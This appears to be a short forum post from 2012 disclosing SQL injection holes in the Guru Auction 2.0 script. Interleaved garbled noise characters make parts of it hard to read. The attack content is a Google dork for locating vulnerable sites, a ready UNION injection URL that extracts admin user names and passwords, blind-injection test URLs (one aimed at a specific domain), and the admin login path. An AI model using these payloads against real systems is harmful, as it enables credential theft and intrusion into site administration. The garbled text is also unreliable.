Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
3 T( r, f: t8 \ Y
- c6 k6 K9 q$ v作者 : v3n0m* h/ z6 A/ V4 O+ ]3 ]+ Y5 M3 ?
应用 : Guru Auction 2.0' o7 D+ f5 H. i& k
Price : $49
$ n) B: \6 h# O4 s3 z) VVendor : http://www.guruscript.com/
: G) j0 D/ x+ n5 VGoogle Dork : inurl:subcat.php?cate_id=
2 Q% D1 c7 P9 k. J : S! Y" J/ E1 w E: C! i+ L. @
SQLi p0c:
d& t! A$ c& u7 W~~~~~~~~~~( K$ _2 b: P6 V% _/ x& K
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--" {0 H6 Z8 h$ s' k3 Z1 y
3 A/ x p/ L1 b" i7 h % \$ v+ g) B3 H* ^, Q- |: `
盲注 p0c:
+ e8 ~) V$ F, Q' @! J: y~~~~~~~~~~: e( g8 A6 E* X! M
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true7 I4 ^) Z1 V4 }# L% L
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false' N7 a( M* q7 E1 {
& V% P0 l1 \% }
管理登录入口:
9 O( @ r6 A6 O: z~~~~~~~~~~/ c3 n, l$ f4 L R) r
http://domain.tld/[path]/admin/
( J' Q9 i3 N1 B& w# Z3 r |
发表于 2012-12-31 09:24:05
收藏
支持
反对